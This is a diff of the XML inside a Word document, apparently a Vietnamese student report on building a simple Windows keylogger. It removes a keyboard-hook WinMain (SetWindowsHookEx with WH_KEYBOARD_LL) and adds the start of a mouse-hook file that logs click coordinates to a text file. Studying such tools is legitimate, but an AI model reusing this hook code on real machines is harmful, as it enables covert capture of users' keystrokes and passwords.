           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7612,7 +7796,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="20" w:name="_Toc57761768"/>
+      <w:bookmarkStart w:id="20" w:name="_Toc60895357"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7762,7 +7946,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="_Toc57761769"/>
+      <w:bookmarkStart w:id="21" w:name="_Toc60895358"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7877,7 +8061,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="22" w:name="_Toc43674110"/>
-      <w:bookmarkStart w:id="23" w:name="_Toc57761770"/>
+      <w:bookmarkStart w:id="23" w:name="_Toc60895359"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7939,7 +8123,23 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Project này dừng lại ở việc nghiên cứu những công nghệ mới nên Keylogger vẫn còn đơn giản. Keylogger có nhiệm vụ: Ghi nhận những phím người dùng nhập vào và lưu vào một file txt.</w:t>
+        <w:t xml:space="preserve">Project này dừng lại ở việc nghiên cứu những công nghệ mới nên Keylogger vẫn còn đơn giản. Keylogger có nhiệm vụ: Ghi nhận những phím người dùng nhập vào </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">và tọa độ chuột người dùng thực hiện click, sau đó </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>lưu vào một file txt.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7965,7 +8165,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="24" w:name="_Toc57761771"/>
+      <w:bookmarkStart w:id="24" w:name="_Toc60895360"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -8807,7 +9007,23 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Kẻ tấn công sẽ sử dụng hàm Hook để bắt các sự kiện mà người dùng nhập từ bàn phím, sau đó dịch các sự kiện này thành ngôn ngữ để đọc</w:t>
+        <w:t>Kẻ tấn công sẽ sử dụng hàm Hook để bắt các sự kiện mà người dùng nhập từ bàn phím</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> và sự kiện người dùng click chuột</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>, sau đó dịch các sự kiện này thành ngôn ngữ để đọc</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8864,7 +9080,7 @@
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:bookmarkStart w:id="25" w:name="_Toc57761772"/>
+      <w:bookmarkStart w:id="25" w:name="_Toc60895361"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12764,7 +12980,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> tagKBDLLHOOKSTRUCT </w:t>
+        <w:t xml:space="preserve"> KBDLLHOOKSTRUCT </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13496,9 +13712,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
-        <w:spacing w:before="120"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
+        <w:spacing w:before="0" w:after="120"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -13519,7 +13733,7 @@
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:bookmarkStart w:id="26" w:name="_Toc57761773"/>
+      <w:bookmarkStart w:id="26" w:name="_Toc60895362"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -13529,42 +13743,9 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>2.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>3</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>. File Keylogger.cpp</w:t>
+        <w:t>2.3. File Mouse.h</w:t>
       </w:r>
       <w:bookmarkEnd w:id="26"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13573,37 +13754,31 @@
         <w:ind w:left="360"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>#include</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>"KeyLogger.h"</w:t>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>#include&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>windows.h&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13613,17 +13788,21 @@
         <w:ind w:left="360"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>#include &lt;string.h&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13633,63 +13812,21 @@
         <w:ind w:left="360"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>int</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> WINAPI </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>WinMain</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>int</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> nCmdShow){</w:t>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>#include &lt;string&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13699,71 +13836,21 @@
         <w:ind w:left="360"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    hKeyHook = </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>SetWindowsHookEx</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>(WH_KEYBOARD_LL, (HOOKPROC)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>GetKey</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>GetModuleHandle</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>(NULL), 0);</w:t>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>#include &lt;stdio.h&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13773,17 +13860,21 @@
         <w:ind w:left="360"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    MSG msg;</w:t>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>#include &lt;iostream&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13793,17 +13884,21 @@
         <w:ind w:left="360"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>#include &lt;stdlib.h&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13820,46 +13915,20 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>while</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>GetMessage</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>(&amp;msg, NULL, 0, 0)){</w:t>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>using namespace std</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13876,28 +13945,20 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>TranslateMessage</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>(&amp;msg);</w:t>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>HHOOK</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> hMouseHook;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13914,28 +13975,90 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>DispatchMessage</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>(&amp;msg);</w:t>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>LRESULT WINAPI</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>GetMouse</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>int</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> nCode, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>WPARAM</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> wParam, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>LPARAM</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> lParam){</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13955,7 +14078,43 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">    }</w:t>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>MSLLHOOKSTRUCT</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> * pMouseStruct = (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>MSLLHOOKSTRUCT</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> *)lParam;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13969,32 +14128,6 @@
           <w:szCs w:val="20"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>UnhookWindowsHookEx</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>(hKeyHook);</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14013,25 +14146,25 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>return</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 0;</w:t>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>FILE</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> *MOUSE;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14051,8 +14184,1963 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
